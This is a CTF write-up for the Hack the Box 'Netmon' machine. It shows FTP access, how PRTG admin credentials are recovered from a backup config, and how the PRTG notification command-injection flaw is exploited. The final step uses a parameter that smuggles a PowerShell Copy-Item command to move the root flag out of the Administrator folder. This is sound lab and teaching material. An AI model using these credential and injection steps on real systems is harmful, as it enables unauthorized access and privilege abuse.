Hack the box - Netmon

Oct 22, 2019 07:24 · 499 words · 3 minute read tutorial writeup ctf

If you never heard about Hack the box before, I recommend you to check my first writeup on the Lame box.

Netmon Box

netmon_logo

Nmap

We start as usual with a port scanning using nmap.

nmap1

nmap2

There is an FTP server and an HTTP server.

FTP

We use a browser to access the FTP server.

ftp

By browsing through the folders, we rapidly find the user flag located in:

ftp://10.10.10.152/Users/Public/user.txt

However, we can not access to the Users/Administrator folder.

Http server: PRTG

prtg

Default credentials

By searching a little, we find that the default credentials for PRTG is

prtgadmin
prtgadmin

But it does not work.

Find stored credentials

As we have access to the whole filesystem via ftp, we can search for stored credentials.

Here is a Reddit post that talks about where PRTG stores by default accounts and passwords in plain text.

PRTG exposes Domain accounts and passwords in plain text.

Let's browse to ftp://10.10.10.152/ProgramData/Paessler/PRTG%20Network%20Monitor/PRTG%20Configuration.old.bak

We open the file with a text editor, we search for user and we found in the <dbpassword> a login.

prtgadmin
PrTg@dmin2018

Well does not work.

But think about what we downloaded, it’s a backup from 2018. And we are in 2019, the password probably changed to PrTg@dmin2019. Yes, it’s the case!

Remote code execution

When searching for the version of PRTG Indy httpd 18.1.37.13946, we find rapidly this blog about remote code execution using the notification system.

PRTG < 18.2.39 Command Injection Vulnerability

Setup → Notifications → Select a notification (for example “Email and push notification to admin”)

Scroll down, there is an option to “Execute Program”.

In the field Program File, select Demo exe notification - outfile.ps1 This default script will write to a file with the current date.

ftp://10.10.10.152/Program%20Files%20(x86)/PRTG%20Network%20Monitor/Notifications/EXE/Demo%20EXE%20Notification%20-%20OutFile.ps1

The source code of the script:

# Demo 'Powershell' Notification for Paessler Network Monitor
# Writes current Date/Time into a File
#
# How to use it:
#
# Create a exe-notification on PRTG, select 'Demo Exe Notifcation - OutFile.ps1' as program,
# The Parametersection consists of one parameter:
#
# - Filename
#
# e.g.
#
#         "C:\temp\test.txt"
#
# Note that the directory specified must exist.
# Adapt Errorhandling to your needs.
# This script comes without warranty or support.


if ($Args.Count -eq 0) {

  #No Arguments. Filename must be specified.

  exit 1;
 }elseif ($Args.Count -eq 1){


  $Path = split-path $Args[0];

  if (Test-Path $Path)    
  {
    $Text = Get-Date;
    $Text | out-File $Args[0];
    exit 0;

  }else
  {
    # Directory does not exist.
    exit 2;
  }
}

So we put a parameter to the script.

nmap2

Save it. Select the notification → Click on the bell icon to send a test notification

The script will be executed with the provided parameter and it will create a file in ftp://10.10.10.152/Users/Public/date.txt with the date for example “Wednesday, May 22, 2019 7:44:56 AM”

So now we execute an more interesting command

C:\Users\Public\date.txt; Copy-Item -Path C:\Users\Administrator\Desktop\root.txt -Destination C:\Users\Public\root.txt -Recurse

This will copy the root flag to an accessible folder.

Via the FTP, we browse to Users\Public\root.txt to retrieve the flag.

tweet Share